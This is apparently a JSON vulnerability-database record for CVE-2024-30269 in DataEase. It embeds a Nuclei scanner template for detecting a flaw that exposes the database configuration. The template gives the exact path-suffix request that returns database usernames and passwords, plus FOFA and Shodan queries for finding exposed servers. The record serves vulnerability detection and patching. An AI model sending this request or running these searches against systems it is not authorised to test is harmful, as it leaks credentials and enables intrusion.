{
  "_links": {
    "capec": {
      "href": "/api/v1/vulnerability/cve-2024-30269/capec"
    },
    "cvss": {
      "href": "/api/v1/vulnerability/cve-2024-30269/cvss"
    },
    "cwe": {
      "href": "/api/v1/vulnerability/cve-2024-30269/cwe"
    },
    "enrichment": {
      "href": "/api/v1/vulnerability/cve-2024-30269/enrichment"
    },
    "gcve": {
      "href": "/api/v1/vulnerability/cve-2024-30269/gcve"
    },
    "self": {
      "href": "/api/v1/vulnerability/cve-2024-30269"
    },
    "sightings": {
      "href": "/api/v1/sightings/cve-2024-30269"
    }
  },
  "data": {
    "nuclei": true,
    "nuclei_template": "http/cves/2024/CVE-2024-30269.yaml",
    "nuclei_template_severity": "medium",
    "nuclei_template_yaml": "id: CVE-2024-30269\n\ninfo:\n  name: DataEase <= 2.4.1 - Sensitive Information Exposure\n  author: s4e-io\n  severity: medium\n  description: |\n    DataEase, an open source data visualization and analysis tool, has a database configuration information exposure vulnerability prior to version 2.5.0. Visiting the `/de2api/engine/getEngine;.js` path via a browser reveals that the platform's database configuration is returned.\n  impact: |\n    Attackers can access sensitive configuration and credential information from the DataEase system.\n  remediation: |\n    Update DataEase to version 2.5.0 or later.\n  reference:\n    - https://nvd.nist.gov/vuln/detail/CVE-2024-30269\n    - https://github.com/dataease/dataease/security/advisories/GHSA-8gvx-4qvj-6vv5\n    - https://github.com/dataease/dataease\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N\n    cvss-score: 5.3\n    cve-id: CVE-2024-30269\n    cwe-id: CWE-200\n    epss-score: 0.15875\n    epss-percentile: 0.96765\n  metadata:\n    verified: true\n    max-request: 1\n    vendor: dataease\n    product: dataease\n    fofa-query: body=\"dataease\"\n    shodan-query: http.html:\"dataease\"\n  tags: cve,cve2024,dataease,exposure,vkev,vuln\n\nhttp:\n  - method: GET\n    path:\n      - \"{{BaseURL}}/de2api/engine/getEngine;.js\"\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'contains_all(body, \"username\", \"password\", \"port\", \"name\\\":\", \"pid\\\":\")'\n          - 'contains(content_type,\"application/json\")'\n          - 'status_code == 200'\n        condition: and\n# digest: 4b0a00483046022100b1c719e336a9fd255113a28434eabf60681cd07d456f4e9017372831d36778a0022100b9ae6af9d83c459da36df58e28d43572c7ca1784057d77817287415844d56f68:922c64590222798bb761d5b6d8e72950"
  },
  "source": "nuclei",
  "vuln_id": "cve-2024-30269"
}